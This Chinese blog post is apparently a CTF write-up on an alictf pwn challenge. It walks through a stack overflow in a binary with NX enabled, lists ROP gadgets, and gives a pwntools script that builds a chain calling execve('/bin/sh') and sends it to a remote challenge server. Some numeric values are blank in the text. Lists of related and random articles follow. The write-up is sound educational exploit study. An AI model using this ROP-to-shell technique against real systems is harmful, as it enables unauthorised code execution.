当程序开启了nx,但程序有syscall调用的时候。这时栈溢出的利用就可以通过rop来执行syscall的59号调用execve('/bin/sh',null,null),这是这次alictf一道pwn的心得。

ida配合gdb定位程序漏洞如下:

signed __int64 __fastcall sub_40108E(__int64 a1)

{

  signed __int64 result; // rax@3

  __int64 v2; // rdx@4

  int v3; // [sp+10h] [bp-40h]@1

  __int64 v4; // [sp+20h] [bp-30h]@1

  __int64 v5; // [sp+28h] [bp-28h]@1

  __int64 v6; // [sp+30h] [bp-20h]@1

  __int64 v7; // [sp+38h] [bp-18h]@1

  __int64 v8; // [sp+40h] [bp-10h]@1

  unsigned int v9; // [sp+48h] [bp-8h]@7

  int v10; // [sp+4Ch] [bp-4h]@4

  v4 = 0LL;

  v5 = 0LL;

  v6 = 0LL;

  v7 = 0LL;

  v8 = 0LL;

  v3 = ;

  sub_400330((__int64)&v3, a1, 80LL);           // 处理输入,首字母py绕过登陆检测,80字节的最后8字节控制ret

  if ( (_BYTE)v3 !=  || BYTE1(v3) !=  )

通过Ropgadget找到构造syscall的rop链如下:





0x46f208 : pop rax;ret

0x401823: pop rdi;ret

0x462873: pop rcx;ret

0x422568: mov dword ptr [rdi], ecx ; ret

0x46f205 : add rsp 0x58  ret

0x43ae29: pop rdx;pop rsi;ret

0x45f2a5:  syscall;ret






利用代码:




from pwn import *

#io=process('./vss')

io=remote('114.55.103.213',)

praxret=0x46f208

prdiret=0x401823

prcxret=0x0000000000462873 # pop rcx  ret

movrdircx = 0x422568

addespret=0x46f205 #add rsp 0x58  ret

prdxrsiret=0x43ae29

syscallret=0x45f2a5

pay='py'+'a'*

pay+=p64(addespret)+'a'*8                      #add rsp 0x58;ret

pay+=p64(praxret)+p64()                      #pop rax;ret

pay+=p64(prcxret)+'/bin/sh\x00'+p64(movrdircx) #pop rcx;ret;mov dword ptr [rdi], ecx ; ret

pay+=p64(prdxrsiret)+p64()+p64()             #pop rdx;pop rsi;ret

pay+=p64(syscallret)                           #syscall;ret

io.recvuntil('Password:\n')

io.sendline(pay)

io.interactive()






 
												


											
栈溢出之rop到syscall的更多相关文章
	

    
								
  1. Android内核栈溢出与ROP(CVE-2013-2597)
		
    一.准备 由于内核栈不可执行(NX),栈溢出利用需用到ROP.简单回顾一下ARM ROP. 漏洞演示代码如下,网上随便找了个. char *str="/system/bin/sh" ...
    
		
    2. 
						
  2. arm64 调试环境搭建及 ROP 实战
		
    前言 比赛的一个 arm 64 位的 pwn 题,通过这个题实践了 arm 64 下的 rop 以及调试环境搭建的方式. 题目文件 https://gitee.com/hac425/blog_data ...
    
		
    3. 
						
  3. 渗透入门rop
		
    原文链接:https://blog.csdn.net/guiguzi1110/article/details/77663430?locationNum=1&fps=1 基本ROP 随着NX保护 ...
    
		
    4. 
						
  4. Buuctf刷题:部分
		
    get_started_3dsctf_2016 关键词:ROP链.栈溢出.mprotect()函数 可参考文章(优质): https://www.cnblogs.com/lyxf/p/12113401 ...
    
		
    5. 
						
  5. D^3ctf两道 pwn
		
    这次 的D^3ctf 又是给吊打 难顶... 所以题都是赛后解出来的,在这感谢Peanuts师傅 unprintableV 看看保护: 看看伪代码,其实代码很少 void __cdecl menu() ...
    
		
    6. 
						
  6. PWN二进制漏洞学习指南
		
    目录 PWN二进制漏洞学习指南 前言 前置技能 PWN概念 概述 发音 术语 PWN环境搭建 PWN知识学习途径 常见漏洞 安全机制 PWN技巧 PWN相关资源博客 Pwn菜鸡小分队 PWN二进制漏洞 ...
    
		
    7. 
						
  7. syscall to rop
		
    前言 hitcon 2017 的 start 题,比较简单,练练手. 题目链接: https://gitee.com/hac425/blog_data/tree/master/hitcon2017 正 ...
    
		
    8. 
						
  8. 构建ROP链实现远程栈溢出
		
    通常情况下栈溢出可能造成的后果有两种,一类是本地提权另一类则是远程执行任意命令,通常C/C++并没有提供智能化检查用户输入是否合法的功能,同时程序编写人员在编写代码时也很难始终检查栈是否会发生溢出,这 ...
    
		
    9. 
						
  9. Linux pwn入门教程(3)——ROP技术
		
    作者:Tangerine@SAINTSEC 原文来自:https://bbs.ichunqiu.com/thread-42530-1-1.html 0×00 背景 在上一篇教程的<shellco ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. Design Pattern —— Prototype /Template Method/Iterator/Composite/Bridge
			
    Prototype /Template Method/Iterator/Composite/Bridge 为什么把这五种设计模式放一起呢,没什么太高大上的原因,就是因为这五种模式JAVA开发最基本的特 ...
    
			
    2. 
						
  2. 认识html标签
			
    让我们通过一个网页的学习,来对html标签有一个初步理解. 平常大家说的上网就是浏览各种各式各样的网页,这些网页都是由html标签组成的. 下面就是一个简单的网页.效果图如下: 我们来分析一下,这个网 ...
    
			
    3. 
						
  3. sql-----点点滴滴
			
    from--------where-------groud by---------having----------select---------order by------------top --时间 ...
    
			
    4. 
						
  4. Integer和int的详细比较(转)
			
    Integer与int的区别我们耳熟详的有两点:1.Integer是int的包装类.2.Integer的默认初始值是null,而int的默认初试值是0. 下面通过代码进行详细比较. public cl ...
    
			
    5. 
						
  5. apache2.2 虚拟主机配置详解
			
    一.修改httpd.conf 打开appserv的安装目录,找到httpd.conf文件,分别去掉下面两行文字前面的#号. #LoadModule vhost_alias_module modules ...
    
			
    6. 
						
  6. Selenium2+Python自动化测试实战
			
    本人在网上查找了很多做自动化的教程和实例,偶然的一个机会接触到了selenium,觉得非常好用.后来就在网上查阅各种selenium的教程,但是网上的东西真的是太多了,以至于很多东西参考完后无法系统的 ...
    
			
    7. 
						
  7. 一元多项式Polynomial的C语言实现
			
    /* 编译器:Dev-c++ 5.4.0 文件名:Polynomial.cpp 代码版本号:1.0 时间:2015年10月9日21:53:26 */ /* 总结: 1.结构体指针指向的区域要手动分配内 ...
    
			
    8. 
						
  8. javascript scroll事件
			
    http://developer.51cto.com/art/201107/277994.htm onscroll事件 window.onscroll|| document.onscroll var  ...
    
			
    9. 
						
  9. java交通灯管理系统项目
			
    交通灯管理系统   模拟实现十字路口的交通灯管理系统逻辑,具体需求如下: 异步随机生成按照各个路线行驶的车辆. 例如: 由南向而来去往北向的车辆 ---- 直行车辆 由西向而来去往南向的车辆 ---- ...
    
			
    10. 
						
  10. 五个新知识:微软SHA2补丁,亚信专业工具,微软官方文档,使用过期签名(附官方推荐链接),注意使用具有UAC的CMD
			
    五个新知识:微软SHA2补丁,亚信专业工具,微软官方文档,使用过期签名 不支持SHA2算法的计算机更新补丁:https://technet.microsoft.com/zh-CN/library/se ...
    
			
    11.